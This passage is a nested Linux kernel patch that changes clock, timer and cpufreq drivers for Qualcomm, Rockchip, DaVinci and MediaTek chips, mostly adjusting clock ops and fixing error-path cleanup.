+ 	{ .fw_name = "sleep_clk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static struct clk_rcg2 disp_cc_mdss_byte0_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 7792b8f237047..096deff2ba257 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -1243,7 +1243,8 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_12,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_12),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm6115.c b/drivers/clk/qcom/gcc-sm6115.c
+index 565f9912039fe..631419caf695a 100644
+--- a/drivers/clk/qcom/gcc-sm6115.c
++++ b/drivers/clk/qcom/gcc-sm6115.c
+@@ -694,7 +694,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -715,7 +715,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -738,7 +738,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -753,7 +753,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -768,7 +768,7 @@ static struct clk_rcg2 gcc_camss_csi2phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -790,7 +790,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -805,7 +805,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -820,7 +820,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -835,7 +835,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -857,7 +857,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -881,7 +881,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -916,7 +916,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -941,7 +941,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -956,7 +956,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -971,7 +971,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -986,7 +986,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1001,7 +1001,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1024,7 +1024,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1046,7 +1046,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1116,7 +1116,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1329,7 +1329,7 @@ static struct clk_rcg2 gcc_ufs_phy_axi_clk_src = {
+ 		.name = "gcc_ufs_phy_axi_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1351,7 +1351,7 @@ static struct clk_rcg2 gcc_ufs_phy_ice_core_clk_src = {
+ 		.name = "gcc_ufs_phy_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1392,7 +1392,7 @@ static struct clk_rcg2 gcc_ufs_phy_unipro_core_clk_src = {
+ 		.name = "gcc_ufs_phy_unipro_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1414,7 +1414,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1483,7 +1483,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm8350.c b/drivers/clk/qcom/gcc-sm8350.c
+index c3731f96c8e6b..430ef407a8341 100644
+--- a/drivers/clk/qcom/gcc-sm8350.c
++++ b/drivers/clk/qcom/gcc-sm8350.c
+@@ -17,6 +17,7 @@
+ #include "clk-regmap.h"
+ #include "clk-regmap-divider.h"
+ #include "clk-regmap-mux.h"
++#include "clk-regmap-phy-mux.h"
+ #include "gdsc.h"
+ #include "reset.h"
+ 
+@@ -167,26 +168,6 @@ static const struct clk_parent_data gcc_parent_data_3[] = {
+ 	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+-static const struct parent_map gcc_parent_map_4[] = {
+-	{ P_PCIE_0_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_4[] = {
+-	{ .fw_name = "pcie_0_pipe_clk", },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+-static const struct parent_map gcc_parent_map_5[] = {
+-	{ P_PCIE_1_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_5[] = {
+-	{ .fw_name = "pcie_1_pipe_clk" },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+ static const struct parent_map gcc_parent_map_6[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_GCC_GPLL0_OUT_MAIN, 1 },
+@@ -289,32 +270,30 @@ static const struct clk_parent_data gcc_parent_data_14[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_0_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_0_pipe_clk_src = {
+ 	.reg = 0x6b054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_4,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_pipe_clk_src",
+-			.parent_data = gcc_parent_data_4,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_4),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_0_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_1_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_1_pipe_clk_src = {
+ 	.reg = 0x8d054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_5,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_pipe_clk_src",
+-			.parent_data = gcc_parent_data_5,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_5),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_1_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 1339f9211a149..134eb1529ede2 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -696,6 +696,8 @@ static const struct qcom_cc_desc lpass_cc_sc7280_desc = {
+ 	.config = &lpass_audio_cc_sc7280_regmap_config,
+ 	.clks = lpass_cc_sc7280_clocks,
+ 	.num_clks = ARRAY_SIZE(lpass_cc_sc7280_clocks),
++	.gdscs = lpass_aon_cc_sc7280_gdscs,
++	.num_gdscs = ARRAY_SIZE(lpass_aon_cc_sc7280_gdscs),
+ };
+ 
+ static const struct qcom_cc_desc lpass_audio_cc_sc7280_desc = {
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 5c1e17bd0d763..8486d7135ab10 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -118,14 +118,18 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 		goto destroy_pm_clk;
+ 	}
+ 
+-	lpass_regmap_config.name = "qdsp6ss";
+-	desc = &lpass_qdsp6ss_sc7280_desc;
+-
+-	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+-	if (ret)
+-		goto destroy_pm_clk;
++	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
++		lpass_regmap_config.name = "qdsp6ss";
++		lpass_regmap_config.max_register = 0x3f;
++		desc = &lpass_qdsp6ss_sc7280_desc;
++
++		ret = qcom_cc_probe_by_index(pdev, 0, desc);
++		if (ret)
++			goto destroy_pm_clk;
++	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
++	lpass_regmap_config.max_register = 0x4;
+ 	desc = &lpass_cc_top_sc7280_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+diff --git a/drivers/clk/rockchip/clk-rk3399.c b/drivers/clk/rockchip/clk-rk3399.c
+index 306910a3a0d38..9ebd6c451b3db 100644
+--- a/drivers/clk/rockchip/clk-rk3399.c
++++ b/drivers/clk/rockchip/clk-rk3399.c
+@@ -1263,7 +1263,7 @@ static struct rockchip_clk_branch rk3399_clk_branches[] __initdata = {
+ 			RK3399_CLKSEL_CON(56), 6, 2, MFLAGS,
+ 			RK3399_CLKGATE_CON(10), 7, GFLAGS),
+ 
+-	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, 0,
++	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, CLK_SET_RATE_PARENT,
+ 			 RK3399_CLKSEL_CON(56), 5, 1, MFLAGS, 0, 5, DFLAGS),
+ 
+ 	/* gic */
+diff --git a/drivers/clocksource/timer-davinci.c b/drivers/clocksource/timer-davinci.c
+index 9996c05425200..b1c248498be46 100644
+--- a/drivers/clocksource/timer-davinci.c
++++ b/drivers/clocksource/timer-davinci.c
+@@ -257,21 +257,25 @@ int __init davinci_timer_register(struct clk *clk,
+ 				resource_size(&timer_cfg->reg),
+ 				"davinci-timer")) {
+ 		pr_err("Unable to request memory region\n");
+-		return -EBUSY;
++		rv = -EBUSY;
++		goto exit_clk_disable;
+ 	}
+ 
+ 	base = ioremap(timer_cfg->reg.start, resource_size(&timer_cfg->reg));
+ 	if (!base) {
+ 		pr_err("Unable to map the register range\n");
+-		return -ENOMEM;
++		rv = -ENOMEM;
++		goto exit_mem_region;
+ 	}
+ 
+ 	davinci_timer_init(base);
+ 	tick_rate = clk_get_rate(clk);
+ 
+ 	clockevent = kzalloc(sizeof(*clockevent), GFP_KERNEL);
+-	if (!clockevent)
+-		return -ENOMEM;
++	if (!clockevent) {
++		rv = -ENOMEM;
++		goto exit_iounmap_base;
++	}
+ 
+ 	clockevent->dev.name = "tim12";
+ 	clockevent->dev.features = CLOCK_EVT_FEAT_ONESHOT;
+@@ -296,7 +300,7 @@ int __init davinci_timer_register(struct clk *clk,
+ 			 "clockevent/tim12", clockevent);
+ 	if (rv) {
+ 		pr_err("Unable to request the clockevent interrupt\n");
+-		return rv;
++		goto exit_free_clockevent;
+ 	}
+ 
+ 	davinci_clocksource.dev.rating = 300;
+@@ -323,13 +327,27 @@ int __init davinci_timer_register(struct clk *clk,
+ 	rv = clocksource_register_hz(&davinci_clocksource.dev, tick_rate);
+ 	if (rv) {
+ 		pr_err("Unable to register clocksource\n");
+-		return rv;
++		goto exit_free_irq;
+ 	}
+ 
+ 	sched_clock_register(davinci_timer_read_sched_clock,
+ 			     DAVINCI_TIMER_CLKSRC_BITS, tick_rate);
+ 
+ 	return 0;
++
++exit_free_irq:
++	free_irq(timer_cfg->irq[DAVINCI_TIMER_CLOCKEVENT_IRQ].start,
++			clockevent);
++exit_free_clockevent:
++	kfree(clockevent);
++exit_iounmap_base:
++	iounmap(base);
++exit_mem_region:
++	release_mem_region(timer_cfg->reg.start,
++			   resource_size(&timer_cfg->reg));
++exit_clk_disable:
++	clk_disable_unprepare(clk);
++	return rv;
+ }
+ 
+ static int __init of_davinci_timer_register(struct device_node *np)
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 7e56a42750ea5..285ba51b31f60 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1727,7 +1727,7 @@ static unsigned int cpufreq_verify_current_freq(struct cpufreq_policy *policy, b
+ 		 * MHz. In such cases it is better to avoid getting into
+ 		 * unnecessary frequency updates.
+ 		 */
+-		if (abs(policy->cur - new_freq) < HZ_PER_MHZ)
++		if (abs(policy->cur - new_freq) < KHZ_PER_MHZ)
+ 			return policy->cur;
+ 
+ 		cpufreq_out_of_sync(policy, new_freq);
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 7f2680bc9a0f4..9a39a7ccfae96 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -373,13 +373,13 @@ static struct device *of_get_cci(struct device *cpu_dev)
+ 	struct platform_device *pdev;
+ 
+ 	np = of_parse_phandle(cpu_dev->of_node, "mediatek,cci", 0);
+-	if (IS_ERR_OR_NULL(np))
+-		return NULL;
++	if (!np)
++		return ERR_PTR(-ENODEV);
+ 
+ 	pdev = of_find_device_by_node(np);
+ 	of_node_put(np);
+-	if (IS_ERR_OR_NULL(pdev))
+-		return NULL;
++	if (!pdev)
++		return ERR_PTR(-ENODEV);
+ 
+ 	return &pdev->dev;
+ }
+@@ -401,7 +401,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	info->ccifreq_bound = false;
+ 	if (info->soc_data->ccifreq_supported) {
+ 		info->cci_dev = of_get_cci(info->cpu_dev);
+-		if (IS_ERR_OR_NULL(info->cci_dev)) {
++		if (IS_ERR(info->cci_dev)) {
+ 			ret = PTR_ERR(info->cci_dev);
+ 			dev_err(cpu_dev, "cpu%d: failed to get cci device\n", cpu);
+ 			return -ENODEV;
+@@ -420,7 +420,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->inter_clk);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get intermediate clk\n", cpu);
+-		goto out_free_resources;
++		goto out_free_mux_clock;
+ 	}
+ 
+ 	info->proc_reg = regulator_get_optional(cpu_dev, "proc");
+@@ -428,13 +428,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->proc_reg);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get proc regulator\n", cpu);
+-		goto out_free_resources;
++		goto out_free_inter_clock;
+ 	}
+ 
+ 	ret = regulator_enable(info->proc_reg);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: failed to enable vproc\n", cpu);
+-		goto out_free_resources;
++		goto out_free_proc_reg;
+ 	}
+ 
+ 	/* Both presence and absence of sram regulator are valid cases. */
+@@ -442,14 +442,14 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (IS_ERR(info->sram_reg)) {
+ 		ret = PTR_ERR(info->sram_reg);
+ 		if (ret == -EPROBE_DEFER)
+-			goto out_free_resources;
++			goto out_disable_proc_reg;
+ 
+ 		info->sram_reg = NULL;
+ 	} else {
+ 		ret = regulator_enable(info->sram_reg);
+ 		if (ret) {
+ 			dev_warn(cpu_dev, "cpu%d: failed to enable vsram\n", cpu);
+-			goto out_free_resources;
++			goto out_free_sram_reg;
+ 		}
+ 	}
+ 
+@@ -458,13 +458,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (ret) {
+ 		dev_err(cpu_dev,
+ 			"cpu%d: failed to get OPP-sharing information\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = dev_pm_opp_of_cpumask_add_table(&info->cpus);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: no OPP table\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = clk_prepare_enable(info->cpu_clk);
+@@ -533,43 +533,41 @@ out_disable_mux_clock:
+ out_free_opp_table:
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 
+-out_free_resources:
+-	if (regulator_is_enabled(info->proc_reg))
+-		regulator_disable(info->proc_reg);
+-	if (info->sram_reg && regulator_is_enabled(info->sram_reg))
++out_disable_sram_reg:
++	if (info->sram_reg)
+ 		regulator_disable(info->sram_reg);
+ 
+-	if (!IS_ERR(info->proc_reg))
+-		regulator_put(info->proc_reg);
+-	if (!IS_ERR(info->sram_reg))
++out_free_sram_reg:
++	if (info->sram_reg)
+ 		regulator_put(info->sram_reg);
+-	if (!IS_ERR(info->cpu_clk))
+-		clk_put(info->cpu_clk);
+-	if (!IS_ERR(info->inter_clk))
+-		clk_put(info->inter_clk);
++
++out_disable_proc_reg:
++	regulator_disable(info->proc_reg);
++
++out_free_proc_reg:
++	regulator_put(info->proc_reg);
++
++out_free_inter_clock:
++	clk_put(info->inter_clk);
++
++out_free_mux_clock:
++	clk_put(info->cpu_clk);
+ 
+ 	return ret;
+ }
+ 
+ static void mtk_cpu_dvfs_info_release(struct mtk_cpu_dvfs_info *info)
+ {
+-	if (!IS_ERR(info->proc_reg)) {
+-		regulator_disable(info->proc_reg);
+-		regulator_put(info->proc_reg);
+-	}
+-	if (!IS_ERR(info->sram_reg)) {
++	regulator_disable(info->proc_reg);
++	regulator_put(info->proc_reg);
++	if (info->sram_reg) {
+ 		regulator_disable(info->sram_reg);
+ 		regulator_put(info->sram_reg);
+ 	}
+-	if (!IS_ERR(info->cpu_clk)) {
+-		clk_disable_unprepare(info->cpu_clk);
+-		clk_put(info->cpu_clk);
+-	}
+-	if (!IS_ERR(info->inter_clk)) {
+-		clk_disable_unprepare(info->inter_clk);
+-		clk_put(info->inter_clk);
+-	}
+-
++	clk_disable_unprepare(info->cpu_clk);
++	clk_put(info->cpu_clk);
++	clk_disable_unprepare(info->inter_clk);
++	clk_put(info->inter_clk);
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 	dev_pm_opp_unregister_notifier(info->cpu_dev, &info->opp_nb);
+ }
+@@ -695,6 +693,15 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ 	.ccifreq_supported = false,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1360000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1360000,
++	.ccifreq_supported = false,
++};
++
+ static const struct mtk_cpufreq_platform_data mt8183_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+@@ -713,20 +720,29 @@ static const struct mtk_cpufreq_platform_data mt8186_platform_data = {
+ 	.ccifreq_supported = true,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt8516_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1310000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1310000,
++	.ccifreq_supported = false,
++};
++
+ /* List of machines supported by this driver */
+ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7622", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8167", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8176", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8183", .data = &mt8183_platform_data },
+ 	{ .compatible = "mediatek,mt8186", .data = &mt8186_platform_data },
+ 	{ .compatible = "mediatek,mt8365", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8516", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt8516", .data = &mt8516_platform_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, mtk_cpufreq_machines);
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index d3f55ca06ed34..64a50777d88b8 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -14,7 +14,6 @@
+ #include <linux/of_address.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_opp.h>
+-#include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
+ #include <linux/units.h>
+@@ -43,7 +42,6 @@ struct qcom_cpufreq_soc_data {
+ 
+ struct qcom_cpufreq_data {
+ 	void __iomem *base;
+-	struct resource *res;
+ 
+ 	/*
+ 	 * Mutex to synchronize between de-init sequence and re-starting LMh
+@@ -58,8 +56,6 @@ struct qcom_cpufreq_data {
+ 	struct clk_hw cpu_clk;
+ 
+ 	bool per_core_dcvs;
+-
+-	struct freq_qos_request throttle_freq_req;
+ };
+ 
+ static struct {
+@@ -349,8 +345,6 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 
+ 	throttled_freq = freq_hz / HZ_PER_KHZ;
+ 
+-	freq_qos_update_request(&data->throttle_freq_req, throttled_freq);
+-
+ 	/* Update thermal pressure (the boost frequencies are accepted) */
+ 	arch_update_thermal_pressure(policy->related_cpus, throttled_freq);
+ 
+@@ -443,14 +437,6 @@ static int qcom_cpufreq_hw_lmh_init(struct cpufreq_policy *policy, int index)
+ 	if (data->throttle_irq < 0)
+ 		return data->throttle_irq;
+ 
+-	ret = freq_qos_add_request(&policy->constraints,
+-				   &data->throttle_freq_req, FREQ_QOS_MAX,
+-				   FREQ_QOS_MAX_DEFAULT_VALUE);
+-	if (ret < 0) {
+-		dev_err(&pdev->dev, "Failed to add freq constraint (%d)\n", ret);
+-		return ret;
+-	}
+-
+ 	data->cancel_throttle = false;
+ 	data->policy = policy;
+ 
+@@ -517,7 +503,6 @@ static void qcom_cpufreq_hw_lmh_exit(struct qcom_cpufreq_data *data)
+ 	if (data->throttle_irq <= 0)
+ 		return;
+ 
+-	freq_qos_remove_request(&data->throttle_freq_req);
+ 	free_irq(data->throttle_irq, data);
+ }
+ 
